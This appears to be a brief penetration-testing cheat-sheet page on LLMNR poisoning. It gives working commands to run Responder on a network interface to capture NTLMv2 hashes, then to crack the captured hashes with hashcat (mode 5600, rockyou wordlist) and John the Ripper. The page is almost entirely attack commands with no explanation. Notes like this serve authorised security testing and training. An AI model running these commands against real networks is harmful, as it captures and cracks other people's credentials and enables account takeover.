LLMNR Poisoning
Practical
Capture NTLMv2 Hash
Start Responder
sudo responder -I eth0

Captured Hash

Crack NTLMv2 Hash
Hashcat
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

John
john --wordlist=<wordlist.txt> hash.txt

Last updated
Was this helpful?